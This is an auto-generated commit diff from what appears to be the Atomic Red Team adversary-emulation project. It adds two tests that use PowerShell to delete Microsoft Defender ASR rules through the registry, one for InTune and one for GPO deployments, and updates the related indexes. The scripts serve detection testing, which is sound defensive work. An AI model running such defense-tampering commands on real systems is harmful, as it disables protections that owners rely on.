Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -461,6 +461,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -310,6 +310,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hy
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -581,6 +581,8 @@
   - Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe [windows]
   - Atomic Test #49: Tamper with Windows Defender Registry - Powershell [windows]
   - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
+  - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
+  - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -405,6 +405,8 @@
   - Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
   - Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe [windows]
   - Atomic Test #49: Tamper with Windows Defender Registry - Powershell [windows]
+  - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
+  - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -20900,6 +20900,62 @@ defense-evasion:
           | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
         name: powershell
         elevation_required: true
+    - name: Delete Microsoft Defender ASR Rules - InTune
+      auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
+      description: This test simulates the deletion of the ASR rules loaded by Microsoft
+        Defender using the registry. Depending on the deployment, rules can be pushed
+        either using GPO or InTune, This test simulates an InTune-based rules deployment.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
+
+          if (-not (Test-Path $registryPath)) {
+            New-Item -Path $registryPath -Force
+            Write-Host "Registry key created: $registryPath"
+          }
+
+          $registryValueName = "ASRRules"
+
+          if (Test-Path "$registryPath\$registryValueName") {
+            Remove-ItemProperty -Path $registryPath -Name $registryValueName
+            Write-Host "Registry value deleted: $registryValueName"
+          } else {
+            New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
+            Write-Host "Registry value created: $registryValueName"
+          }
+
+
+          Remove-ItemProperty -Path $registryPath -Name $registryValueName
+          Write-Host "Registry value deleted: $registryValueName"
+        name: powershell
+        elevation_required: true
+    - name: Delete Microsoft Defender ASR Rules - GPO
+      auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
+      description: This test simulates the deletion of the ASR rules loaded by Microsoft
+        Defender using the registry. Depending on the deployment, rules can be pushed
+        either using GPO or InTune, This test simulates a GPO-based rules deployment.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
+
+          if (-not (Test-Path $registryPath)) {
+              New-Item -Path $registryPath -Force
+              Write-Host "Registry key created: $registryPath"
+          }
+
+          $newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
+          $newValueData = "1"
+          New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
+          Write-Host "Registry value created: $newValueName with data $newValueData"
+
+          Remove-ItemProperty -Path $registryPath -Name $newValueName
+          Write-Host "Registry value deleted: $newValueName"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -16960,6 +16960,62 @@ defense-evasion:
           -Value 1 \n"
         name: powershell
         elevation_required: true
+    - name: Delete Microsoft Defender ASR Rules - InTune
+      auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
+      description: This test simulates the deletion of the ASR rules loaded by Microsoft
+        Defender using the registry. Depending on the deployment, rules can be pushed
+        either using GPO or InTune, This test simulates an InTune-based rules deployment.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
+
+          if (-not (Test-Path $registryPath)) {
+            New-Item -Path $registryPath -Force
+            Write-Host "Registry key created: $registryPath"
+          }
+
+          $registryValueName = "ASRRules"
+
+          if (Test-Path "$registryPath\$registryValueName") {
+            Remove-ItemProperty -Path $registryPath -Name $registryValueName
+            Write-Host "Registry value deleted: $registryValueName"
+          } else {
+            New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
+            Write-Host "Registry value created: $registryValueName"
+          }
+
+
+          Remove-ItemProperty -Path $registryPath -Name $registryValueName
+          Write-Host "Registry value deleted: $registryValueName"
+        name: powershell
+        elevation_required: true
+    - name: Delete Microsoft Defender ASR Rules - GPO
+      auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
+      description: This test simulates the deletion of the ASR rules loaded by Microsoft
+        Defender using the registry. Depending on the deployment, rules can be pushed
+        either using GPO or InTune, This test simulates a GPO-based rules deployment.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
+
+          if (-not (Test-Path $registryPath)) {
+              New-Item -Path $registryPath -Force
+              Write-Host "Registry key created: $registryPath"
+          }
+
+          $newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
+          $newValueData = "1"
+          New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
+          Write-Host "Registry value created: $newValueName with data $newValueData"
+
+          Remove-ItemProperty -Path $registryPath -Name $newValueName
+          Write-Host "Registry value deleted: $newValueName"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/T1562.001/T1562.001.md

@@ -116,6 +116,10 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar
 
 - [Atomic Test #50 - ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50---esxi---disable-account-lockout-policy-via-powercli)
 
+- [Atomic Test #51 - Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51---delete-microsoft-defender-asr-rules---intune)
+
+- [Atomic Test #52 - Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52---delete-microsoft-defender-asr-rules---gpo)
+
 
 <br/>
 
@@ -2159,4 +2163,92 @@ Install-Module -Name VMware.PowerCLI -Confirm:$false
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #51 - Delete Microsoft Defender ASR Rules - InTune
+This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
+
+if (-not (Test-Path $registryPath)) {
+  New-Item -Path $registryPath -Force
+  Write-Host "Registry key created: $registryPath"
+}
+
+$registryValueName = "ASRRules"
+
+if (Test-Path "$registryPath\$registryValueName") {
+  Remove-ItemProperty -Path $registryPath -Name $registryValueName
+  Write-Host "Registry value deleted: $registryValueName"
+} else {
+  New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
+  Write-Host "Registry value created: $registryValueName"
+}
+
+
+Remove-ItemProperty -Path $registryPath -Name $registryValueName
+Write-Host "Registry value deleted: $registryValueName"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #52 - Delete Microsoft Defender ASR Rules - GPO
+This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
+
+if (-not (Test-Path $registryPath)) {
+    New-Item -Path $registryPath -Force
+    Write-Host "Registry key created: $registryPath"
+}
+
+$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
+$newValueData = "1"
+New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
+Write-Host "Registry value created: $newValueName with data $newValueData"
+
+Remove-ItemProperty -Path $registryPath -Name $newValueName
+Write-Host "Registry value deleted: $newValueName"
+```
+
+
+
+
+
+
 <br/>